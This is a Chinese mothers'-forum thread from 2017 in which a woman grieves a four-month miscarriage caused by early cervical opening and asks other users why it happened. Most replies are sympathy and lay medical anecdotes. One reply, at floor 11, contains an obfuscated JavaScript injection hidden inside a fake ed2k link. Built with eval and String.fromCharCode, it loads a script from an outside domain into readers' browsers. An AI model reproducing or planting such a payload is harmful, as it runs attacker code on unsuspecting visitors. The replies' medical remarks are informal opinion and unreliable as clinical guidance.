‹ 上一主題|下一主題 go 回復(fù): 101 | 瀏覽: 14059 |倒序瀏覽 | 字體: tT
手機看此貼
  • 微信掃一掃 手機看此貼
  • 好內(nèi)容 隨時分享到朋友圈

[ 其他 ]

懷孕4個月流產(chǎn),真的很想不通

[復(fù)制鏈接]

經(jīng)驗值
注冊時間
    • 媽媽網(wǎng)輕聊
      給生活加點料

• 媽媽網(wǎng)孕育
      就是好用

holdImg
    • 廣州媽媽網(wǎng)
      廣州媽媽網(wǎng),更懂廣州媽媽

廣州媽媽網(wǎng)二維碼
樓主
發(fā)表于 2017-3-17 15:33 |只看該作者 | 最新帖子 | 查看作者所有帖子 | 發(fā)短消息 | 加為好友 | 字體大小: tT
二寶離開我一周了,這一周來,每次想到已經(jīng)成型的寶寶離我而去,就難受得哭。他已經(jīng)會動了,流產(chǎn)前一天我還摸到他的小身子把我的肚子拱起來一個小包,然后說沒就沒了。
住院了一個星期出院,到現(xiàn)在對寶寶為什么突然沒了,還是不明白,問醫(yī)生,也是顧左而言他,不知道有沒有懂這方面的寶媽給說說呢?
一直以來產(chǎn)檢的情況都很好,而且從之前檢查結(jié)果來看,寶寶發(fā)育還比較快,比一般寶寶個子都大。上上個周六做B超的時候都還是好好的,到了上周三早上起床的時候,不過隔了4天,突然見紅。到了醫(yī)院,醫(yī)生說是宮口開了,要住院。當晚就宮縮痛得我要死,打了反應(yīng)特別大的保胎藥后,痛得半死才保住一晚上;第二晚上宮縮又提前了,這次就算是打那個讓我痛的死去活來的藥也保不住了,凌晨的時候,寶寶就流產(chǎn)了??吹降粝聛淼膶殞殻家呀?jīng)好大了,心里真的是很難過。
相比較而言,寶寶剛走的時候可能還沒反應(yīng)過來,心里雖然難受,但也還好,過了兩天緩過勁來,這事兒都不能想,想到都忍不住哭。都已經(jīng)4個月了,咋就能說沒就沒了呢?我就不明白了,我也沒有很辛苦,也沒有怎么的,怎么就4個月開宮口了呢?開了宮口,是不是就一定保不住了?醫(yī)院只給我打兩種藥,說4個月保胎,就只有那個辦法。就只有那個辦法了嗎?

回帖推薦

yuyu5255 發(fā)表于11樓  查看完整內(nèi)容

ed2k://|file|filesize|'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'|8798/

炮炮貓 發(fā)表于12樓  查看完整內(nèi)容

抱抱樓主,看了替你傷心。。。。你在哪家醫(yī)院看的?是見紅第幾次?鮮血嗎?多么?四個月就開始宮縮?。。。我現(xiàn)在25周,見紅三次,少量,鮮血,每次兩天左右,我是23周后才會感覺到宮縮,二胎,所以知道什么是宮縮。我現(xiàn)在關(guān)鍵三次見紅B超都沒事,醫(yī)生沒開藥。我天天都擔心我還發(fā)了貼在媽網(wǎng)咨詢呢。。 ...

炮炮貓 發(fā)表于23樓  查看完整內(nèi)容

保重,好好養(yǎng)身體,省二應(yīng)該不錯啊,聽說葉敦敏很好,中西醫(yī)調(diào)理一段時間吧。祝安好。

炮炮貓 發(fā)表于34樓  查看完整內(nèi)容

在婦幼微信看過可以可以做個手術(shù)把宮頸口扎緊,快生的時候拿出來的。

寬心陳心怡 發(fā)表于37樓  查看完整內(nèi)容

我求兒女路10年了,今年8月36歲了,07年人流后一直沒懷上,2012年輸卵管通水5次通,2016年12月宮腔鏡手術(shù)切子宮內(nèi)膜息肉,來了兩次月經(jīng)后自然懷上了(正打算去試促排卵的)但還是沒保住,17號流產(chǎn)了,5周+大的,知道你的痛,難過是必然的,我也忍不住哭了好幾回,哭出來舒服點,多主動跟家人說你的難過讓家人多開導(dǎo)一下,快點走出難關(guān)!保重身體,重新出發(fā)!加油! ...

lilywu1980  抱抱寶媽,保重身體!  發(fā)表于 2017-3-28 09:12

注冊時間
BB生日
回復(fù) 海天戀 的帖子

情趣愛愛鋪網(wǎng)友建議,平時注意自己的身體,鍛煉的時間,休息好。

注冊時間
BB生日
寶媽,心情不要太不好了,這樣的情況,很多人都遇到過,好好養(yǎng)好身體,多學(xué)習,我們下一胎 加油寶媽

經(jīng)驗值
注冊時間
為你感到難過~也想知道有沒有了解的分享一下看法,也想了解!
來自[移動wap版]

注冊時間

雖然不懂,但抱抱你,別難過~勇敢跨過去
來自[媽媽網(wǎng)iPhone版]

經(jīng)驗值
注冊時間

廣州通商家

抱抱寶媽

注冊時間

怎么會這樣啊,寶媽好好休息,寶寶會再來的??
來自[媽媽網(wǎng)iPhone版]

經(jīng)驗值
注冊時間
怎么會這樣呀,中期不是穩(wěn)定了嗎? 好好休息,寶寶會再來的

經(jīng)驗值
注冊時間
BB生日

為你真的感到難過,不過機會還有的是,加油

Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19

經(jīng)驗值
注冊時間
抱抱樓主,看了替你傷心。。。。你在哪家醫(yī)院看的?是見紅第幾次?鮮血嗎?多么?四個月就開始宮縮?。。。我現(xiàn)在25周,見紅三次,少量,鮮血,每次兩天左右,我是23周后才會感覺到宮縮,二胎,所以知道什么是宮縮。我現(xiàn)在關(guān)鍵三次見紅B超都沒事,醫(yī)生沒開藥。我天天都擔心我還發(fā)了貼在媽網(wǎng)咨詢呢。。
來自[移動wap版]

經(jīng)驗值
注冊時間

cc辰辰媽媽 發(fā)表于 2017-03-17 15:45
寶媽,心情不要太不好了,這樣的情況,很多人都遇到過,好好養(yǎng)好身體,多學(xué)習,我們下一胎 加油寶媽..

謝謝,下次肯定要更小心謹慎了。
來自[移動wap版]

經(jīng)驗值
注冊時間

jinying237 發(fā)表于 2017-03-17 23:12
為你感到難過~也想知道有沒有了解的分享一下看法,也想了解!

是的,就想知道這種情況是否真的就回天乏力了呢。
來自[移動wap版]

經(jīng)驗值
注冊時間

小林豬999 發(fā)表于 2017-03-17 23:20
雖然不懂,但抱抱你,別難過~勇敢跨過去

謝謝,會堅強的。
來自[移動wap版]

經(jīng)驗值
注冊時間

伊麗莎白醫(yī)院 發(fā)表于 2017-03-18 08:51

抱抱寶媽

謝謝。
來自[移動wap版]

經(jīng)驗值
注冊時間

1587945 發(fā)表于 2017-03-18 18:18
怎么會這樣呀,中期不是穩(wěn)定了嗎? 好好休息,寶寶會再來的

是啊,我也不明白,都過了3個月了。
來自[移動wap版]

經(jīng)驗值
注冊時間

炮炮貓 發(fā)表于 2017-03-18 21:05
抱抱樓主,看了替你傷心。。。。你在哪家醫(yī)院看的?是見紅第幾次?鮮血嗎?多么?四個月就開始宮縮?。。。我現(xiàn)..

在省二醫(yī)看的,就是第一次見紅,宮口就開了,血量濕了一條內(nèi)褲。查B超也是沒事,醫(yī)生查看宮口才發(fā)現(xiàn)問題的。但見紅當晚,宮縮就厲害得不行,打藥才熬過去,第二晚打藥也堅持不住了。
來自[移動wap版]
‹ 上一主題|下一主題
快速回復(fù)

回帖后跳轉(zhuǎn)到最后一頁

廣東省通信管理局互聯(lián)網(wǎng)清理整頓 增值電信業(yè)務(wù)經(jīng)營許可證:粵B2-20220217粵ICP備09174648號粵網(wǎng)安備案號:4406043011754公安機關(guān)備案號:44010602000095 Copyright 2004-2024 盛成科技 All Right Reserved版權(quán)所有    版權(quán)保護投訴指引

互聯(lián)網(wǎng)藥品信息服務(wù)資格證書 電子營業(yè)執(zhí)照 網(wǎng)絡(luò)文化經(jīng)營許可證粵網(wǎng)文[2016]7051-1702號

違法和不良信息/涉未成年人有害信息舉報電話:020-85505893/18122325185 舉報郵箱:kf@mama.cn 涉未成年人有害信息舉報專區(qū) 中國互聯(lián)網(wǎng)不良信息舉報中心
網(wǎng)絡(luò)內(nèi)容從業(yè)人員違法違規(guī)行為舉報:kf@mama.cn 開發(fā)者:廣州盛成媽媽網(wǎng)絡(luò)科技股份有限公司 應(yīng)用版本:11.12.0 應(yīng)用涉及權(quán)限APP隱私協(xié)議

回頂部